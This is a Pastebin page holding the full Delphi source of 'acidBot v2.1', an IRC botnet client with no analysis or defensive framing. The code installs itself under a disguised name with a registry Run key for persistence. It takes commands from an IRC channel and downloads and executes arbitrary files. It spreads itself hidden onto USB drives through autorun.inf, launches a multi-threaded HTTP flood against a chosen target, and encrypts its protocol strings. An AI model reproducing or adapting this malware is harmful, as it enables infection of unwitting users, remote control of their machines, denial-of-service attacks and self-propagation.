API tools faq
paste
Advertisement
FlyFar

acidBot2.dpr

FlyFar
Dec 19th, 2023
1,230
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Delphi 9.20 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. program acidBot2;
  2. // acidBot v2.1 by Acid/HuckJam
  3. // This bot was made to show that Delphi
  4. // is perfectly fine for bots too.
  5.  
  6. // Credits to Aphex for his TThread & ApplicationUnit.
  7.  
  8. uses
  9.   Windows,
  10.   WinSock,
  11.   ShellAPI,
  12.   abEncryption,
  13.   abFunctions,
  14.   abWinsock,
  15.   abThreads,
  16.   abApplication,
  17.   abHTTPFlood;
  18.  
  19. var
  20.   IRCDInfo: array[1..4] of String = ('10.0.0.3', '32828', '#kewl', '');
  21.   FileInfo: array[1..4] of String = ('regdrv.exe', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'Registry Driver', 'aB2-Mutex');
  22.   AuthInfo: array[1..3] of String = ('*!*@*', 'mypassword', '!');
  23.   BotComnd: array[1..11] of String = ('login', 'logout', 'uninstall', 'die', 'version', 'sysinfo', 'opensite', 'download', 'spread', 'httpflood', 'httpfloodstop');
  24.   IRCProto: array[1..7] of String = ('����', '����', '����', '����', '����', '���', '�������');
  25.  
  26. var
  27.   Application: TApplication;
  28.   ircSocket: TClientSocket;
  29.   GetPath, AuthName, BotName, Master, Target: String;
  30.   Port: Integer;
  31.   Mutex: Cardinal;
  32.   LoggedIn, PrivateMsg, Spread, Flooding: Boolean;
  33.  
  34. procedure DecryptStrings();
  35. var
  36.   I: Integer;
  37. begin
  38.   for I := 1 to 7 do IRCProto[I] := Decrypt(IRCProto[I]);
  39. end;
  40.  
  41. procedure SendMessage(Msg: String);
  42. begin
  43.   if PrivateMsg then ircSocket.SendString(IRCProto[7] + ' ' + Master + ' :' + Msg + #10#13) else
  44.   ircSocket.SendString(IRCProto[7] + ' ' + IRCDInfo[3] + ' :' + Msg + #10#13);
  45. end;
  46.  
  47. procedure HTTPFloodThread();
  48. var
  49.   httpSocket: TClientSocket;
  50.   Site: String;
  51. begin
  52.   httpSocket := TClientSocket.Create;
  53.   while Flooding do
  54.   begin
  55.     httpSocket.Connect(Target, Port);
  56.     if httpSocket.Connected then
  57.     begin
  58.       Site := 'http://' + Target;
  59.       httpSocket.SendString(CreateHTTPRequest(Site));
  60.       httpSocket.Disconnect;
  61.       Sleep(1);
  62.       Application.ProcessMessages;
  63.     end;
  64.   end;
  65.   httpSocket.Free;
  66. end;
  67.  
  68. procedure SpreadUSB();
  69. var
  70.   Drive: Char;
  71.   Path: String;
  72.   AutoStart: TextFile;
  73. begin
  74.   while Spread do
  75.   begin
  76.     for Drive := 'B' to 'Z' do
  77.     begin
  78.       if GetDriveType(PChar(Drive + ':\')) = DRIVE_REMOVABLE then
  79.       begin
  80.         Path := Drive + ':\' + FileInfo[1];
  81.         if FileExists(Path) = False then
  82.         begin
  83.           CopyFile(PChar(ParamStr(0)), PChar(Path), False);
  84.           SetFileAttributes(PChar(Path), FILE_ATTRIBUTE_HIDDEN);
  85.           AssignFile(AutoStart, Drive + ':\' + 'autorun.inf');
  86.           ReWrite(AutoStart);
  87.           WriteLn(AutoStart, '[autorun]');
  88.           WriteLn(AutoStart, 'open=' + FileInfo[1]);
  89.           CloseFile(AutoStart);
  90.           SetFileAttributes(PChar(Drive + ':\' + 'autorun.inf'), FILE_ATTRIBUTE_HIDDEN);
  91.           SendMessage('[Spread] Device found, file dropped.');
  92.         end;
  93.       end;
  94.     end;
  95.     Sleep(30000);
  96.   end;
  97. end;
  98.  
  99. procedure Install(Uninstall: Integer);
  100. begin
  101.   if Uninstall = 0 then
  102.   begin
  103.     if MatchStrings(ParamStr(0), GetPath) = False then
  104.     begin
  105.       CopyFile(PChar(ParamStr(0)), PChar(GetPath), False);
  106.       ExecuteFile(GetPath);
  107.       ExitProcess(0);
  108.     end else InsertRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3], GetPath);
  109.   end else
  110.   if Uninstall = 1 then
  111.   begin
  112.     DeleteRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3]);
  113.     DeleteSelf(ParamStr(0));
  114.     ExitProcess(0);
  115.   end;
  116. end;
  117.  
  118. procedure ParseIRC(RawData: String);
  119. var
  120.   Trimmed: String;
  121.   Param: array[1..4] of String;
  122.   RawDataBack: String;
  123.   I: Integer;
  124. begin
  125.   if (CheckAuthHost(AuthInfo[1], RawData)) and (Pos(IRCProto[7], RawData) > 0) then
  126.   begin
  127.     RawDataBack := RawData;
  128.     Delete(RawDataBack, 1, 1);
  129.     Master := Copy(RawDataBack, 1, Pos('!', RawDataBack) - 1);
  130.     if Pos(BotName, RawDataBack) > 7 then PrivateMsg := True else PrivateMsg := False;
  131.     if PrivateMsg then Delete(RawDataBack, 1, Pos(BotName + ' :', RawDataBack) + Length(BotName) + 1) else
  132.     Delete(RawDataBack, 1, Pos(IRCDInfo[3] + ' :', RawDataBack) + Length(IRCDInfo[3]) + 1);
  133.     Trimmed := TrimEx(RawDataBack);
  134.     if LeftStr(Trimmed, 1) = AuthInfo[3] then
  135.     begin
  136.       Delete(Trimmed, 1, 1);
  137.  
  138.       //This is a cheap method so we don't need to make a TStringList replacement.
  139.       //There might be a better way but this is what I chose.
  140.       Param[1] := Split(Trimmed, ' ', 1);
  141.       Param[2] := Split(Trimmed, ' ', 2);
  142.       Param[3] := Split(Trimmed, ' ', 3);
  143.       Param[4] := Split(Trimmed, ' ', 4);
  144.  
  145.       if Param[1] = BotComnd[1] then
  146.       begin
  147.         if Param[2] = AuthInfo[2] then
  148.         begin
  149.           if LeftStr(RawData, 25) <> AuthName then
  150.           begin
  151.             LoggedIn := True;
  152.             AuthName := LeftStr(RawData, 25);
  153.             SendMessage('Welcome Master!');
  154.           end;
  155.         end;
  156.       end;
  157.  
  158.       if LoggedIn = True then
  159.       begin
  160.         if Param[1] = BotComnd[2] then
  161.         begin
  162.           LoggedIn := False;
  163.           AuthName := '';
  164.           SendMessage('I will wait for you master!');
  165.         end;
  166.       end;
  167.  
  168.       if (LoggedIn = True) and (AuthName = LeftStr(RawData, 25)) then
  169.       begin
  170.         if Trimmed = BotComnd[3] then Install(1);
  171.         if Trimmed = BotComnd[4] then ExitProcess(0);
  172.         if Trimmed = BotComnd[5] then SendMessage('acidBot v2.1');
  173.         if Trimmed = BotComnd[6] then SendMessage('OS: ' + GetWinVersion + ', Processor: ' + GetProcessorName + ', RAM: ' + GetTotalRAM + ', GFX Card: ' + GetVideoCard + ', System Uptime: ' + GetUptime);
  174.  
  175.         if Param[1] = BotComnd[7] then
  176.         begin
  177.           ShellExecute(0, 'open', PChar(Param[2]), '', '', SW_SHOW);
  178.           SendMessage('The website have been opened.');
  179.         end;
  180.  
  181.         if Param[1] = BotComnd[8] then
  182.         begin
  183.           SendMessage('Attempting to download ' + Param[2]);
  184.           if Download(Param[2], Param[3]) then
  185.           begin
  186.             if Param[4] <> '1' then SendMessage('Download Complete!');
  187.             if Param[4] = '1' then
  188.             begin
  189.               ExecuteFile(Param[3]);
  190.               SendMessage('File Downloaded & Executed!');
  191.             end;
  192.           end else SendMessage('Download Failed!');
  193.         end;
  194.  
  195.         if Param[1] = BotComnd[9] then
  196.         begin
  197.           if Param[2] = 'on' then
  198.           begin
  199.             Spread := True;
  200.             TThread.Create(@SpreadUSB, 0);
  201.             SendMessage('[Spread] Spreading ON.');
  202.           end else
  203.           if Param[2] = 'off' then
  204.           begin
  205.             Spread := False;
  206.             SendMessage('[Spread] Spreading OFF.');
  207.           end;
  208.         end;
  209.  
  210.         if Param[1] = BotComnd[10] then
  211.         begin
  212.           Flooding := True;
  213.           if Pos('http://', Param[2]) > 0 then Delete(Param[2], 1, 7);
  214.           if RightStr(Param[2], 1) = '/' then Delete(Param[2], Length(Param[2]), 1);
  215.           Target := Param[2];
  216.           Port := StrToInt(Param[3]);
  217.           for I := 0 to 20 do TThread.Create(@HTTPFloodThread, 0);
  218.           SendMessage('[HTTPFlood] Started on ' + Target);
  219.         end;
  220.  
  221.         if Param[1] = BotComnd[11] then
  222.         begin
  223.           Flooding := False;
  224.           SendMessage('[HTTPFlood] Stopped.');
  225.         end;
  226.  
  227.       end;
  228.     end;
  229.   end;
  230. end;
  231.  
  232. procedure RecieveData(Thread: TThread; Socket: TClientSocket);
  233. var
  234.  Data, Temp: String;
  235.  NonBlocking: Integer;
  236. begin
  237.  NonBlocking := 1;
  238.  IoCtlSocket(Socket.Socket, FIONBIO, NonBlocking);
  239.  while Socket.Connected do
  240.  begin
  241.   Data := Socket.ReceiveString;
  242.   if Length(Data) > 0 then
  243.   begin
  244.     while(Pos(#10, Data) <> 0) do
  245.     begin
  246.       Temp := Copy(Data, 1, Pos(#10, Data) - 1);
  247.       Delete(Data, 1, Pos(#10, Data));
  248.       ParseIRC(Temp);
  249.       if Pos(IRCProto[6], Temp) > 0 then ircSocket.SendString(IRCProto[3] + ' ' + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
  250.       if (Pos(IRCProto[2], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0)then ircSocket.SendString(IRCProto[3] + ' '  + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
  251.       if (Pos(IRCProto[1], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0) then ircSocket.SendString(ReplaceString(Temp, IRCProto[1], 'pong') + #10#13);
  252.     end;
  253.     if Temp <> '' then Temp := '';
  254.     Data := '';
  255.   end;
  256.   Sleep(1);
  257.   Application.ProcessMessages;
  258.  end;
  259.  Socket.Disconnect;
  260.  Socket.Free;
  261. end;
  262.  
  263. procedure CreateConnection(Thread: TThread);
  264. begin
  265.  while 0 < 1 do
  266.  begin
  267.    ircSocket := TClientSocket.Create;
  268.    ircSocket.Connect(IRCDInfo[1], StrToInt(IRCDInfo[2]));
  269.    if ircSocket.Connected then
  270.    begin
  271.      Randomize;
  272.      BotName := '[' + GetWinLang + '|' + IntToStr(100000000 + Random(899999999)) + ']';
  273.      ircSocket.SendString(IRCProto[4] + ' acidBot acidBot acidBot acidBot ' + #10#13);
  274.      ircSocket.SendString(IRCProto[5] + ' ' + BotName + #10#13);
  275.      RecieveData(Thread, ircSocket);
  276.    end;
  277.    Sleep(5000);
  278.  end;
  279. end;
  280.  
  281. begin
  282.   GetPath := GetAppDataPath + FileInfo[1];
  283.   DecryptStrings();
  284.   Install(0);
  285.   Mutex := CreateMutex(nil, True, PChar(FileInfo[4]));
  286.   if (Mutex = 0) or (GetLastError = ERROR_ALREADY_EXISTS) then ExitProcess(0);
  287.   DeleteFile('~SystemCache.bat');
  288.   if MatchStrings(ParamStr(0), GetPath) then
  289.   TThread.Create(@CreateConnection, 0);
  290.   Application := TApplication.Create;
  291.   while 0 < 1 do
  292.   begin
  293.     Sleep(1);
  294.     Application.ProcessMessages;
  295.   end;
  296. end.
Tags: botnet delphi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!